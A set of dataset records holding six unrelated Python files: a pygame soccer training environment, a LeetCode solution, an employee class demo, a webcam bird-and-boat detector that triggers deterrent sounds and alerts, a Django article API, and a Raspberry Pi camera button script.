+{"seq_id":"189926060","text":"import pygame\r\nimport time\r\nimport random\r\nimport torch\r\n\r\nclass Ball():\r\n def __init__(self):\r\n self.img = pygame.image.load('Soccerball.png')\r\n self.dx = 0\r\n self.dy = 0\r\n self.dimension = 20\r\n self.x = 190\r\n self.y = 240\r\n\r\n def reset(self):\r\n self.dx = 0\r\n self.dy = 0\r\n self.x = 190\r\n self.y = 240\r\n \r\n def draw(self, soccerField, player1, player2, gameDisplay, display=False):\r\n self.setPosition(self.x + self.dx, self.y + self.dy, soccerField, player1, player2)\r\n\r\n if self.y == soccerField.topBorder:\r\n if inBetween(self.x, soccerField.goalStart, soccerField.goalEnd) and inBetween(self.x + self.dimension, soccerField.goalStart, soccerField.goalEnd):\r\n if self.dy != 0:\r\n player2.goals += 1\r\n self.reset()\r\n player1.reset()\r\n player2.reset()\r\n \r\n if self.y + self.dimension == soccerField.bottomBorder:\r\n if inBetween(self.x, soccerField.goalStart, soccerField.goalEnd) and inBetween(self.x + self.dimension, soccerField.goalStart, soccerField.goalEnd):\r\n if self.dy != 0:\r\n player1.goals += 1\r\n self.reset()\r\n player1.reset()\r\n player2.reset()\r\n\r\n if self.dx > 0:\r\n self.dx -= 1\r\n elif self.dx < 0:\r\n self.dx += 1\r\n if self.dy > 0:\r\n self.dy -= 1\r\n elif self.dy < 0:\r\n self.dy += 1\r\n \r\n if display:\r\n gameDisplay.blit(self.img, (self.x, self.y))\r\n\r\n def setPosition(self, x, y, soccerField, player1, player2):\r\n # if a player has the ball, it goes with them unless stolen by the other player\r\n if player1.possession:\r\n if (inBetween(x, player2.x, player2.x + player2.dimension) or inBetween(x + self.dimension, player2.x, player2.x + player2.dimension)) and (inBetween(y, player2.y, player2.y + player2.dimension) or inBetween(y + self.dimension, player2.y, player2.y + player2.dimension)):\r\n # do a steal\r\n player1.possession = False\r\n\r\n if self.x < player1.x:\r\n self.dx = -1\r\n elif self.x > player1.x:\r\n self.dx = 1\r\n\r\n if self.y < player1.y:\r\n self.dy = -1\r\n elif self.y > player1.y:\r\n self.dy = 1\r\n\r\n self.x = player1.x + player1.dimension\r\n self.y = player1.y + player1.dimension\r\n else:\r\n player1.possession = True\r\n self.x = player1.x + player1.dimension\r\n self.y = player1.y + player1.dimension\r\n self.dx = 0\r\n self.dy = 0\r\n \r\n elif player2.possession:\r\n if (inBetween(x, player1.x, player1.x + player1.dimension) or inBetween(x + self.dimension, player1.x, player1.x + player1.dimension)) and (inBetween(y, player1.y, player1.y + player1.dimension) or inBetween(y + self.dimension, player1.y, player1.y + player1.dimension)):\r\n # do a steal\r\n player2.possession = False\r\n\r\n if self.x < player1.x:\r\n self.dx = -1\r\n elif self.x > player1.x:\r\n self.dx = 1\r\n\r\n if self.y < player1.y:\r\n self.dy = -1\r\n elif self.y > player1.y:\r\n self.dy = 1\r\n\r\n self.x = player1.x + player1.dimension\r\n self.y = player1.y + player1.dimension\r\n else:\r\n player2.possession = True\r\n self.x = player2.x + player2.dimension\r\n self.y = player2.y + player2.dimension\r\n self.dx = 0\r\n self.dy = 0\r\n \r\n else:\r\n player1.possession = False\r\n player2.possession = False\r\n \r\n # if the ball travels on its own to the border of the field, it stops there\r\n if x + self.dimension > soccerField.rightBorder:\r\n self.x = soccerField.rightBorder - self.dimension\r\n elif x < soccerField.leftBorder:\r\n self.x = soccerField.leftBorder\r\n else:\r\n self.x = x\r\n\r\n if y + self.dimension > soccerField.bottomBorder:\r\n self.y = 
soccerField.bottomBorder - self.dimension\r\n elif y < soccerField.topBorder:\r\n self.y = soccerField.topBorder\r\n else:\r\n self.y = y\r\n\r\n # if the ball is next to a player, they get position of it\r\n if inBetween(x, player1.x, player1.x + player1.dimension) or inBetween(x + self.dimension, player1.x, player1.x + player1.dimension):\r\n if inBetween(y, player1.y, player1.y + player1.dimension) or inBetween(y + self.dimension, player1.y, player1.y + player1.dimension):\r\n player1.possession = True\r\n player2.possession = False\r\n self.x = player1.x + player1.dimension\r\n self.y = player1.y + player1.dimension\r\n self.dx = 0\r\n self.dy = 0\r\n \r\n if inBetween(x, player2.x, player2.x + player2.dimension) or inBetween(x + self.dimension, player2.x, player2.x + player2.dimension):\r\n if inBetween(y, player2.y, player2.y + player2.dimension) or inBetween(y + self.dimension, player2.y, player2.y + player2.dimension):\r\n player2.possession = True\r\n player1.possession = False\r\n self.x = player2.x + player2.dimension\r\n self.y = player2.y + player2.dimension\r\n self.dx = 0\r\n self.dy = 0\r\n\r\nclass Field():\r\n def __init__(self):\r\n self.img = pygame.image.load('pitch.png')\r\n self.topBorder = 25\r\n self.leftBorder = 25\r\n self.bottomBorder = 475\r\n self.rightBorder = 375\r\n self.goalStart = 150\r\n self.goalEnd = 250\r\n\r\n def draw(self, gameDisplay, display=False):\r\n if display:\r\n gameDisplay.blit(self.img,(0,0))\r\n\r\nclass Player():\r\n def __init__(self, num):\r\n if (num == 1):\r\n self.img = pygame.image.load('player1.png')\r\n self.direction = 1\r\n self.y = 25\r\n elif (num == 2):\r\n self.img = pygame.image.load('player2.png')\r\n self.direction = -1\r\n self.y = 415\r\n\r\n self.num = num\r\n self.x = 170\r\n self.dx = 0\r\n self.dy = 0\r\n self.dimension = 60\r\n self.possession = False \r\n self.kickForce = 12\r\n self.goals = 0 \r\n \r\n def reset(self):\r\n if (self.num == 1):\r\n self.y = 25\r\n elif (self.num == 2):\r\n self.y = 415\r\n \r\n self.x = 170\r\n self.dx = 0\r\n self.dy = 0\r\n\r\n def draw(self, soccerField, gameDisplay, display=False):\r\n self.setPosition(self.x + self.dx, self.y + self.dy, soccerField)\r\n if display:\r\n gameDisplay.blit(self.img,(self.x, self.y))\r\n\r\n def setPosition(self, x, y, soccerField):\r\n if x + self.dimension > soccerField.rightBorder:\r\n self.x = soccerField.rightBorder - self.dimension\r\n elif x < soccerField.leftBorder:\r\n self.x = soccerField.leftBorder\r\n else:\r\n self.x = x\r\n \r\n if y + self.dimension > soccerField.bottomBorder:\r\n self.y = soccerField.bottomBorder - self.dimension\r\n elif y < soccerField.topBorder:\r\n self.y = soccerField.topBorder\r\n else:\r\n self.y = y\r\n \r\n def kick(self, soccerBall):\r\n if self.possession:\r\n self.possession = False\r\n soccerBall.dy = self.direction*self.kickForce\r\n if self.num == 2:\r\n soccerBall.y = self.y - soccerBall.dimension\r\n\r\nclass SoccerGame():\r\n def __init__(self, display_width=400, display_height=500):\r\n pygame.init()\r\n self.gameDisplay = pygame.display.set_mode((display_width,display_height))\r\n pygame.display.set_caption('Soccer')\r\n self.n_action_space = 5\r\n self.n_observation_space = 14\r\n\r\n def step(self, player_1_action, player_2_action):\r\n done = False\r\n p1_rew = 0\r\n p2_rew = 0\r\n p1_possession_initial = self.p1.possession\r\n p2_possession_initial = self.p2.possession\r\n\r\n if player_1_action == 0:\r\n if self.p1.possession:\r\n self.p1.dx = -3\r\n else:\r\n self.p1.dx = -5\r\n \r\n 
elif player_1_action == 1:\r\n            if self.p1.possession:\r\n                self.p1.dx = 3\r\n            else:\r\n                self.p1.dx = 5\r\n\r\n        elif player_1_action == 2:\r\n            if self.p1.possession:\r\n                self.p1.dy = -3\r\n            else:\r\n                self.p1.dy = -5\r\n\r\n        elif player_1_action == 3:\r\n            if self.p1.possession:\r\n                self.p1.dy = 3\r\n            else:\r\n                self.p1.dy = 5\r\n\r\n        elif player_1_action == 4:\r\n            self.p1.kick(self.ball)\r\n\r\n        if player_2_action == 0:\r\n            if self.p2.possession:\r\n                self.p2.dx = -3\r\n            else:\r\n                self.p2.dx = -5\r\n            \r\n        elif player_2_action == 1:\r\n            if self.p2.possession:\r\n                self.p2.dx = 3\r\n            else:\r\n                self.p2.dx = 5\r\n\r\n        elif player_2_action == 2:\r\n            if self.p2.possession:\r\n                self.p2.dy = -3\r\n            else:\r\n                self.p2.dy = -5\r\n\r\n        elif player_2_action == 3:\r\n            if self.p2.possession:\r\n                self.p2.dy = 3\r\n            else:\r\n                self.p2.dy = 5\r\n\r\n        elif player_2_action == 4:\r\n            self.p2.kick(self.ball)\r\n        \r\n        self.field.draw(self.gameDisplay, self.display)        \r\n        self.p2.draw(self.field, self.gameDisplay, self.display)\r\n        self.p1.draw(self.field, self.gameDisplay, self.display)\r\n        self.ball.draw(self.field, self.p1, self.p2, self.gameDisplay, self.display)\r\n        displayScores(self.p1, self.p2, self.gameDisplay, self.display)\r\n\r\n        if self.display:\r\n            pygame.display.update()\r\n            self.clock.tick(60)\r\n\r\n        # done if a goal was scored - a single goal by either side ends the\r\n        # episode, so the two counters are checked with `or`, not `and`\r\n        if self.p1.goals != 0 or self.p2.goals != 0:\r\n            done = True\r\n            if self.p1.goals != 0:\r\n                p1_rew += 30000\r\n                p2_rew += -10000\r\n            else:\r\n                p1_rew += -10000\r\n                p2_rew += 30000\r\n\r\n        # reward for gaining possession\r\n        if self.p1.possession and not p1_possession_initial:\r\n            p1_rew += 10\r\n            p2_rew += -10\r\n        elif self.p1.possession:\r\n            p1_rew += 3\r\n            p2_rew += -1\r\n\r\n        if self.p2.possession and not p2_possession_initial:\r\n            p2_rew += 10\r\n            p1_rew += -10\r\n        elif self.p2.possession:\r\n            p2_rew += 3\r\n            p1_rew += -1\r\n\r\n        next_state = torch.tensor([self.p1.x, self.p1.y, self.p1.dx, self.p1.dy, int(self.p1.possession), self.p2.x, self.p2.y, self.p2.dx, self.p2.dy, int(self.p2.possession), self.ball.x, self.ball.y, self.ball.dx, self.ball.dy])\r\n\r\n        if done:\r\n            next_state = None\r\n        \r\n        return (next_state, torch.tensor(p1_rew), torch.tensor(p2_rew), done)\r\n    \r\n    def reset(self, display=False):\r\n        self.clock = pygame.time.Clock()\r\n        self.display=display\r\n        self.ball = Ball()\r\n        self.p1 = Player(1)\r\n        self.p2 = Player(2)\r\n        self.field = Field()\r\n\r\n        return torch.tensor([self.p1.x, self.p1.y, self.p1.dx, self.p1.dy, int(self.p1.possession), self.p2.x, self.p2.y, self.p2.dx, self.p2.dy, int(self.p2.possession), self.ball.x, self.ball.y, self.ball.dx, self.ball.dy])  # initial state vector\r\n\r\ndef inBetween(x, y, z):\r\n    # returns true if the number x is in between y and z\r\n    if x >= y and x <= z:\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef displayScores(player1, player2, gameDisplay, display=False):\r\n    if display:\r\n        display_width = 400\r\n        player1_str = \"P1: \" + str(player1.goals)\r\n        player2_str = \"P2: \" + str(player2.goals)\r\n\r\n        red = (255, 0, 0)\r\n        black = (0, 0, 0)\r\n\r\n        font = pygame.font.SysFont(None, 25)\r\n\r\n        player1_txt = font.render(player1_str, True, red)\r\n        player2_txt = font.render(player2_str, True, black)\r\n\r\n        gameDisplay.blit(player1_txt, (0, 0))\r\n        gameDisplay.blit(player2_txt, (display_width - player2_txt.get_width(), 0))\r\n\r\n\r\nif __name__ == '__main__':\r\n    done = False\r\n    game = SoccerGame()\r\n    s_0 = game.reset(display=False)\r\n    while not done:\r\n        action_1 = random.randrange(0, 5)\r\n        action_2 
= random.randrange(0, 5)\r\n s_1, p1_r, p2_r, done = game.step(action_1, action_2)\r\n if p1_r != 0:\r\n print(\"P1 Reward: {}, Action: {}\".format(p1_r, action_1))\r\n if p2_r != 0:\r\n print(\"P2 Reward: {}, Action: {}\".format(p2_r, action_2))\r\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"134985921","text":"class Solution(object):\n def longestWord(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: str\n \"\"\"\n seen = set()\n seen.add('')\n res = ''\n words.sort(key=len)\n for word in words:\n if word[:-1] in seen:\n seen.add(word)\n if len(word) > len(res):\n res = word\n elif len(word) == len(res):\n res = min(word, res)\n return res","sub_path":"leetcode/python/ex_720.py","file_name":"ex_720.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"73950217","text":"'''\nModule Docstring\n'''\n\n\nclass Employee():\n '''\n Create a Employee Class\n '''\n # Define the details for the Employee class\n def __init__(self, name, dob, emp_id):\n self.name = name\n self.dob = dob\n self.emp_id = emp_id\n self.email = self.emp_id + \"@testcompany.com\"\n\n# Add a __str__ method to give a Human readable desciption of the class.\n\n def __str__(self):\n return \"This is the Employee Class __str__\"\n\n# Add a __repr__ method to return the Class used to create the object.\n\n def __repr__(self):\n return \"Employee(self, name,dob,emp_id)\"\n\n# Method to \n\n# Method to display the Employee's information\n\n def display(self):\n '''\n Function Docstring\n '''\n print('\\n') # Inserts new line.\n print(\"The Employee's name is: \" + self.name)\n print(\"The Employee's date of Birth is \" + self.dob)\n print(\"The Employee's ID is \" + self.emp_id)\n print(\"The Employee's Email Address is \" + self.email)\n print(\"The Employee's Contract Type is: \" + self.__class__.__name__)\n print(\"\\n\")\n\n\nclass Temporary(Employee):\n\n '''\n Create a Sub Class of Employee for Temporary Employees\n '''\n\n # Class variable to allow tracking of number of Employees\n no_of_temp_emp = 0\n\n def __init__(self, name, dob, emp_id):\n super().__init__(name, dob, emp_id) # Inherited from Employee Class\n self.hourlyrate = None # Specific to Temporary Class\n self.weeklyhours = None # Specific to Temporary Class\n self.tgp = None # Temporary Gross Weekly Pay\n # Add to running total of Temporary Employees\n Temporary.no_of_temp_emp = Temporary.no_of_temp_emp + 1\n\n # Add a __str__ method to give a Human readable desciption of the class.\n\n def __str__(self):\n return \"This is the Temporary Employee Class __str__method\"\n\n # Add a __repr__ method to return the Class used to create the object\n\n def __repr__(self):\n return \"Temporary(self, name,dob,emp_id)\"\n\n # Method to calculate the gross weekly wage of the Employee\n\n def salary_info(self):\n '''\n Function Docstring\n '''\n self.tgp = (self.hourlyrate * self.weeklyhours)\n print('\\n')\n print(f'Employee hourly rate: £{self.hourlyrate}')\n print(f'Employee contracted weekly hours:{self.weeklyhours} hours')\n print(f'Employee gross weekly salary: £{self.tgp}')\n\n\nclass Permanent(Employee):\n '''\n Create a Sub Class of Employee for Permanent Employees\n '''\n # Class variable to allow tracking of number of Employees\n no_of_perm_emp = 0\n\n def __init__(self, name, dob, emp_id, ):\n super().__init__(name, dob, emp_id) # Inherited from Employee Class\n self.annualsalary = None # Specific to Permanent Class\n self.pensionplan = None # Sepcific to Permanent Class\n self.pgp = None # Permanent Gross Weekly Pay\n # Increment the number of permanent employees by 1\n Permanent.no_of_perm_emp = Permanent.no_of_perm_emp + 1\n\n# Add a __str__ method to give a Human readable desciption of the class.\n\n def __str__(self):\n return \"This is the Permanent Employee Class __str__ method\"\n\n# Add a __repr__ method to return the Class used to create the object\n\n def __repr__(self):\n return \"Permanent(self, name,dob,emp_id)\"\n\n# Add a method to calculate the Permanent Gross Weekly salary\n def salary_info(self):\n '''\n Function Docstring\n '''\n self.pgp = (self.annualsalary / 52)\n print('\\n')\n print(f'Employee Annual Salary: £{self.annualsalary}')\n print(f'Employee Pension Scheme Status: {self.pensionplan}')\n print(f'Employee gross weekly salary: £{self.pgp}')\n\n\n# Create an 
Employee\n\njohn = Temporary('John Wall', '19/06/1975', 'E0001')\njohn.hourlyrate = float(5.55)\njohn.weeklyhours = float(37.5)\n\nstuart = Permanent('Stuart Riding', '06/06/1975', 'E0002')\nstuart.annualsalary = 36000\nstuart.pensionplan = \"Member\"\n\n# Program to access the data\n\nACTIVE = True\n\nwhile ACTIVE is True:\n print(\"\\n\")\n print(\"Please choose from the following options: \")\n print(\"\\n\")\n print(\"1. Class Details\")\n print(\"2. Employee Numbers\")\n print(\"3. Employee Details\")\n print(\"\\n\")\n command = input(\"> \")\n # Check the command entered\n if command == \"1\":\n # Print the Class Details.\n # Display the output of the __str__ methods for each sub-class\n print(stuart)\n print(john)\n elif command == \"2\":\n # Print the Employee Numbers\n all_emp = int(Temporary.no_of_temp_emp) + int(Permanent.no_of_perm_emp)\n print(f\"Total No. of Temporary Employees:{Temporary.no_of_temp_emp}\")\n print(f\"Total No. of Permanent Employees:{Permanent.no_of_perm_emp}\")\n print(f\"Total No. of Employees: {all_emp}\")\n elif command == \"3\":\n # Enter a second loop to access Employee Details\n print(\"\\n\")\n print(\"Select your Employee:\")\n # Select which Employee details you wish to see\n print(\"1. John Wall\")\n print(\"2. Stuart Riding\")\n selection = input(\"> \")\n if selection == \"1\":\n john.display()\n # Display the Employee's Personal Data. Method from Parent Class\n john.salary_info()\n # Display the Employee's Salary data. Method from Sub Class\n elif selection == \"2\":\n stuart.display()\n # Display the Employee's Personal Data. Method from Parent Class\n stuart.salary_info()\n # Display the Employee's Salary data. Method from Sub Class\n else:\n print(\"Invalid ID. Please try again.\")\n # Invalid Employee entered. Start Again\n else:\n ACTIVE = False\n # Press any other button, and the programme ends\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"533195078","text":"# coding: utf-8\n\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport pygame\nimport time\nimport datetime\nimport random\nimport urllib.request\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\n\nimport cv2\n#cap = cv2.VideoCapture('http://192.168.43.161:29444/videostream.cgi?user=admin&pwd=88888888')\ncap = cv2.VideoCapture(0)\n#cap = cv2.VideoCapture(0)\n'''if tf.__version__ < '1.4.0':\n raise ImportError('Please upgrade your tensorflow installation to v1.4.* or later!')\n'''\nsys.path.append(\"..\")\n\n# ## Object detection imports\n# Here are the imports from the object detection module.\n\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\n\n\n# Model preparation\n# Any model exported using the `export_inference_graph.py` tool can be loaded here simply by changing `PATH_TO_CKPT` to point to a new .pb file. \n# By default we use an \"SSD with Mobilenet\" model here. See the [detection model zoo](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md) for a list of other models that can be run out-of-the-box with varying speeds and accuracies.\n\n# What model to download.\nMODEL_NAME = 'hyericustom_77996'\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join('data', 'object-detection.pbtxt')\n\nNUM_CLASSES = 7\n\n\n# Load a (frozen) Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n\n# Loading label map\n# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. 
Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine\npygame.mixer.init()\nbang=pygame.mixer.Sound(\"police_s.wav\")\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\nglobal capcount\ncapcount = 0\nglobal play\nplay = 0\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n while True:\n ret,image_np=cap.read()\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n \n \n final_score = np.squeeze(scores) \n count = 0\n unharmfulcount = 0\n for i in range(100):\n if scores is None or final_score[i] > 0.3:\n count = count + 1 \n \n # wwwwwwwwwww print name and score !!!!!!!!!!!!!!!\n objects = [] \n global harmful\n \n harmful = 1\n unharmfulcount = 0\n harmfulcountbird=0\n harmfulcountship=0\n \n for index,value in enumerate(classes[0]):\n now = datetime.datetime.now().strftime(\"%y_%m_%d_%H-%M-%S\")\n if scores[0,index] > 0.3:\n print(category_index.get(value))\n if category_index.get(value).get('name')=='person' or category_index.get(value).get('name')=='pigeon' or category_index.get(value).get('name')=='eurasicanTreeSparrow':\n unharmfulcount = unharmfulcount + 1\n harmful = 1\n elif category_index.get(value).get('name')=='baikalTeal' or category_index.get(value).get('name')=='greyHeron' or category_index.get(value).get('name')=='cormorant' or category_index.get(value).get('name')=='cormorant':\n harmfulcountbird = harmfulcountbird + 1\n harmful = 0\n start = time.time()\n transstart = time.gmtime(start)\n print(transstart)\n elif category_index.get(value).get('name')=='fishBoat':\n harmfulcountship = harmfulcountship + 1\n harmful = 0\n start = time.time()\n transstart = time.gmtime(start)\n print(transstart)\n harmfulcount = harmfulcountbird + harmfulcountship\n random_num = random.randrange(1,4)\n print(random_num) \n if (harmful==0 and unharmfulcount >= 1) or (harmful==0 and unharmfulcount==0): \n if play==1:\n print('siren is already being played')\n elapsed = start - end\n elapsed2 = start - end2\n if elapsed > 30:\n print('gg')\n cv2.imwrite(\"/var/www/html/imgs/\" + str(now) + \".jpg\", image_np)\n interval = time.time()\n end = interval\n if elapsed2 > 10:\n push ='1'\n 
url = \"http://localhost/fcm/push_notification.php?push=\"+push\n response = urllib.request.urlopen(url)\n data = response.read()\n print(data)\n interval2 = time.time()\n end2 = interval2\n pass\n elif play==0:\n if random_num==1 and harmfulcountbird >= 1:\n pygame.mixer.music.load('police_s.wav')\n pygame.mixer.music.play(-1)\n elif (random_num==1 or random_num==2 or random_num==3) and harmfulcountship >= 1:\n pygame.mixer.music.load('police_s.wav')\n pygame.mixer.music.play(-1)\n elif random_num==2 and harmfulcountbird >= 1:\n pygame.mixer.music.load('freq.wav')\n pygame.mixer.music.play(-1)\n elif random_num==3 and harmfulcountbird >= 1:\n pygame.mixer.music.load('hawksound.wav')\n pygame.mixer.music.play(-1) \n #bang.play()\n print('now siren is silent, so play the siren')\n if capcount ==0:\n print('capcount=%d'%capcount)\n cv2.imwrite(\"/var/www/html/imgs/\" + str(now) + \".jpg\", image_np)\n capcount = 1\n print('capcount=%d'%capcount)\n end = time.time()\n end2 = time.time()\n push='1'\n url = \"http://localhost/fcm/push_notification.php?push=\"+push\n response = urllib.request.urlopen(url)\n data = response.read()\n print(data)\n\t\n elif capcount ==1: \n elapsed = start - end\n elapsed2 = start - end2\n print(elapsed)\n if elapsed > 30: #every 30seconds, capture the image\n cv2.imwrite(\"/var/www/html/imgs/\" + str(now) + \".jpg\", image_np)\n interval = time.time()\n end = interval\n if elapsed2 > 10: #every 5minutes, send a android alarm\n push='1'\n url = \"http://localhost/fcm/push_notification.php?push=\"+push\n response = urllib.request.urlopen(url)\n data = response.read()\n print(data)\n\n interval2 = time.time()\n end2 = interval2\n play = 1\n print('alredy siren and speaker is turned on')\n elif harmful!=0 and harmfulcount==0: \n pygame.mixer.music.stop()\n print('it is not harmful, so didnt play the speaker and siren')\n play=0\n\n \n \n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=4)\n \n cv2.imshow('object detection',cv2.resize(image_np,(800,600)))\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break;\n \n","sub_path":"noGPIO2.py","file_name":"noGPIO2.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"375838349","text":"from Tadmin.models import Article\nfrom rest_framework import serializers,status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nclass ArticleSerializer(serializers.ModelSerializer):\n title = serializers.CharField(min_length=1)\n class Meta:\n model = Article\n fields = '__all__'\n\n@api_view(['GET','POST'])\ndef a_article_list(request):\n if request.method == 'GET':\n article_1 = Article.objects.order_by('-id') #order_by('-id')\n serializer =ArticleSerializer(article_1,many=True)\n return Response(serializer.data)\n elif request.method == 'POST':\n serializer = ArticleSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n body = {\n 'body': serializer.errors,\n 'msg': '40001'\n }\n return Response(body, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['PUT','DELETE','GET','POST'])\ndef a_article_info(request,id):\n article = Article.objects.get(id=id)\n if request.method == 'GET':\n # article_1 = Article.objects.order_by('-id') #order_by('-id')\n serializer = ArticleSerializer(article)\n return Response(serializer.data)\n if request.method == 'PUT':\n serializer = ArticleSerializer(article,data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n if request.method == 'POST':\n serializer = ArticleSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n body = {\n 'body': serializer.errors,\n 'msg': '40001'\n }\n return Response(body, status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n article.delete()\n return Response({'msg': 'A-OK'}, status=status.HTTP_201_CREATED)\n","sub_path":"Tadmin/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"397147726","text":"from picamera import PiCamera\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\ncamera = PiCamera()\n\nGPIO.setup(2, GPIO.IN, pull_up_down = GPIO.PUD_UP) # Pin Push Button NoIR\nGPIO.setup(3, GPIO.IN, pull_up_down = GPIO.PUD_UP) # Pin Push Button NoIR 940\nGPIO.setup(4, GPIO.IN, pull_up_down = GPIO.PUD_UP) # Pin Push Button NoIR 880\nGPIO.setup(17, GPIO.IN, pull_up_down = GPIO.PUD_UP) # Pin Push Button NoIR 785\nGPIO.setup(18, GPIO.OUT) # Pin LED\n\nA=0 \nB=0\nC=0\nD=0\n\nwhile True:\n button_stateN = GPIO.input(2) # Pin Push Button NoIR\n button_state9 = GPIO.input(3) # Pin Push Button NoIR 940\n button_state8 = GPIO.input(4) # Pin Push Button NoIR 880\n button_state7 = GPIO.input(17) # Pin Push Button NoIR 785\n \n if button_stateN == False: #NoIR\n GPIO.output(18, GPIO.HIGH)\n print('Button Pressed NoIR %s...' %A)\n time.sleep(2)\n camera.start_preview()\n# Take Picture\n GPIO.output(18, GPIO.LOW)\n time.sleep(4)\n camera.capture('/home/pi/Desktop/NoIR Result/1.1 NoIR %s.jpg' % A)\n A+=1\n GPIO.output(18, GPIO.HIGH)\n time.sleep(0.5)\n# Stop Picture\n camera.stop_preview()\n time.sleep(0.2)\n else:\n GPIO.output(18, GPIO.LOW)\n \n if button_state9 == False: # NoIR 940\n GPIO.output(18, GPIO.HIGH) \n print('Button Pressed BN940 %s...' %B)\n time.sleep(2)\n camera.start_preview()\n# Take Picture\n GPIO.output(18, GPIO.LOW)\n time.sleep(4)\n camera.capture('/home/pi/Desktop/NoIR Result/1.2 NoIR BN940 %s.jpg' % B)\n B+=1\n GPIO.output(18, GPIO.HIGH)\n time.sleep(0.5)\n# Stop Picture\n camera.stop_preview()\n time.sleep(0.2)\n else:\n GPIO.output(18, GPIO.LOW)\n \n if button_state8 == False: # NoIR 880\n GPIO.output(18, GPIO.HIGH)\n print('Button Pressed BN880 %s...' %C)\n time.sleep(2)\n camera.start_preview()\n# Take Picture\n GPIO.output(18, GPIO.LOW)\n time.sleep(4)\n camera.capture('/home/pi/Desktop/NoIR Result/1.3 NoIR BN880 %s.jpg' % C)\n C+=1\n GPIO.output(18, GPIO.HIGH)\n time.sleep(0.5)\n# Stop Picture\n camera.stop_preview()\n time.sleep(0.2)\n else:\n GPIO.output(18, GPIO.LOW)\n \n if button_state7 == False: # NoIR 785\n GPIO.output(18, GPIO.HIGH)\n print('Button Pressed BN785 %s...' %D)\n time.sleep(2)\n camera.start_preview()\n# Take Picture\n GPIO.output(18, GPIO.LOW)\n time.sleep(4)\n camera.capture('/home/pi/Desktop/NoIR Result/1.4 NoIR BN785 %s.jpg' % D)\n D+=1\n GPIO.output(18, GPIO.HIGH)\n time.sleep(0.5)\n# Stop Picture\n camera.stop_preview()\n time.sleep(0.2)\n else:\n GPIO.output(18, GPIO.LOW)\n \n\n\n","sub_path":"PROGRAM Camera Tongsis/(Rev 1)PB NoIR 3 Band.py","file_name":"(Rev 1)PB NoIR 3 Band.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
